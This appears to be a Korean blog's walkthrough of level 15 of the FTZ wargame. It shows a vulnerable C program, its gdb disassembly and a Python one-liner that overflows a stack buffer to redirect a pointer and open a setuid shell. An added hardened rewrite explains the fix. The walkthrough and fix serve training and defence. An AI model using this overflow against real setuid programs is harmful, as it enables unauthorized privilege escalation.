Security_Misc/ftz
ftz 15
정지홍
2024. 8. 22. 00:05
192.168.174.128
Level15 Password is "guess what".
[level15@ftz level15]$ cat hint
#include <stdio.h>

main()
{
    int crap;
    int *check;
    char buf[20];

    fgets(buf,45,stdin);

    if (*check==0xdeadbeef)
    {
        setreuid(3096,3096);
        system("/bin/sh");
    }
}
[level15@ftz level15]$ gdb attackme
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x08048490 <main+0>: push ebp
0x08048491 <main+1>: mov ebp,esp
0x08048493 <main+3>: sub esp,0x38 # 56 bytes
0x08048496 <main+6>: sub esp,0x4 # 4 bytes
0x08048499 <main+9>: push ds:0x8049664 # this is the real address of buf
0x0804849f <main+15>: push 0x2d # 45 bytes
0x080484a1 <main+17>: lea eax,[ebp-56] # looks like the start address of buf
0x080484a4 <main+20>: push eax
0x080484a5 <main+21>: call 0x8048360 <fgets>
0x080484aa <main+26>: add esp,0x10
0x080484ad <main+29>: mov eax,DWORD PTR [ebp-16]
0x080484b0 <main+32>: cmp DWORD PTR [eax],0xdeadbeef
0x080484b6 <main+38>: jne 0x80484dd <main+77>
0x080484b8 <main+40>: sub esp,0x8
0x080484bb <main+43>: push 0xc18
0x080484c0 <main+48>: push 0xc18
0x080484c5 <main+53>: call 0x8048380 <setreuid>
0x080484ca <main+58>: add esp,0x10
0x080484cd <main+61>: sub esp,0xc
0x080484d0 <main+64>: push 0x8048548
0x080484d5 <main+69>: call 0x8048340 <system>
0x080484da <main+74>: add esp,0x10
0x080484dd <main+77>: leave
0x080484de <main+78>: ret
0x080484df <main+79>: nop
End of assembler dump.
Since check is a pointer, fill the 40 bytes between buf (ebp-56) and check (ebp-16) and then put in an address value.
(gdb) x/40x 0x008048492
0x8048492 <main+2>: 0x38ec83e5 0xff04ec83 0x04966435 0x8d2d6a08
0x80484a2 <main+18>: 0xe850c845 0xfffffeb6 0x8b10c483 0x3881f045
0x80484b2 <main+34>: 0xdeadbeef 0xec832575 0x0c186808 0x18680000
0x80484c2 <main+50>: 0xe800000c 0xfffffeb6 0x8310c483 0x48680cec
0x80484d2 <main+66>: 0xe8080485 0xfffffe66 0xc910c483 0x895590c3
0x80484e2 <__do_global_ctors_aux+2>: 0xec8353e5 0x962ca104 0x2cbb0804 0x83080496
0x80484f2 <__do_global_ctors_aux+18>: 0x1674fff8 0x8d00768d 0x000027bc 0xeb830000
0x8048502 <__do_global_ctors_aux+34>: 0x8bd0ff04 0xfff88303 0x5b58f475 0x8955c35d
0x8048512 <init_dummy+2>: 0x08ec83e5 0xc35dec89 0x0000b68d 0x89550000
0x8048522 <_fini+2>: 0xe85253e5 0x00000000 0x12c3815b 0x8d000011
[level15@ftz level15]$ (python -c 'print"a"*40+ "\xb2\x84\x04\x08"'; cat ) | ./attackme
my-pass
Level16 Password is "about to cause mass".
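For the fix side of this level, here is an added example that is not part of the original post or of the FTZ challenge: a hardened rewrite of the hint program. The original has two defects that together make the 0xdeadbeef comparison controllable from input: fgets(buf,45,stdin) into char buf[20] writes past the buffer and over the stack slot of check at [ebp-16], and check is never assigned, so it holds whatever the overflow left there. The rewrite bounds the read by sizeof buf, initializes check to point at a real object, drains the rest of an overlong line so it is not mistaken for the next input, and (an assumption, since the hint never defines what the token is) interprets the line as a hex number compared against the constant. The privileged action is reported as a return value instead of calling setreuid()/system(), and first_passing_line() is a test helper over constructed sample input.

```c
/* Added example (not from the original post or the FTZ challenge):
 * a hardened rewrite of the level15 hint program.
 *   - the read is bounded by the real buffer size, not a literal 45;
 *   - `check` is initialized, so it can never be a stale stack value;
 *   - the hex-token interpretation of the line is an assumption.
 * The privileged action is a return value rather than setreuid()/system(),
 * so the logic can be exercised without a setuid binary.
 */
#define _POSIX_C_SOURCE 200809L   /* fmemopen() for the test helper */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Explicit prototype so the helper compiles even under strict -std= modes. */
FILE *fmemopen(void *buf, size_t size, const char *mode);

#define MAGIC 0xdeadbeefu

/* Read one line from `in`.  Returns 1 if the check passes, 0 if it fails,
 * -1 at end of input. */
int read_and_check(FILE *in)
{
    char buf[20];
    uint32_t value = 0;
    uint32_t *check = &value;      /* initialized: points at a real object */

    /* Bounded by the real buffer size: at most 19 characters plus the NUL. */
    if (fgets(buf, (int)sizeof buf, in) == NULL)
        return -1;

    /* If the line did not fit, fgets() leaves the remainder in the stream.
     * Discard it so the next call starts on a fresh line instead of reading
     * the tail of this one as a new token. */
    if (strchr(buf, '\n') == NULL) {
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }

    value = (uint32_t)strtoul(buf, NULL, 16);   /* assumed intended semantics */
    return *check == MAGIC;
}

/* Test helper: run read_and_check() over every line of `text` (constructed
 * sample input) and return the 0-based index of the first line that passes,
 * or -1 if none does. */
int first_passing_line(const char *text)
{
    FILE *f = fmemopen((void *)text, strlen(text), "r");
    int idx = 0, r;

    if (f == NULL)
        return -1;
    while ((r = read_and_check(f)) != -1) {
        if (r == 1) {
            fclose(f);
            return idx;
        }
        idx++;
    }
    fclose(f);
    return -1;
}

int main(void)
{
    /* Stand-alone use: read one line from stdin and report the outcome. */
    int r = read_and_check(stdin);
    printf(r == 1 ? "check passed\n" : "check failed\n");
    return r == 1 ? 0 : 1;
}
```

With the bounded read, the 44-byte line from the walkthrough above cannot reach check at all: only 19 characters land in buf, the rest is discarded, and the comparison is made against a value the program itself wrote.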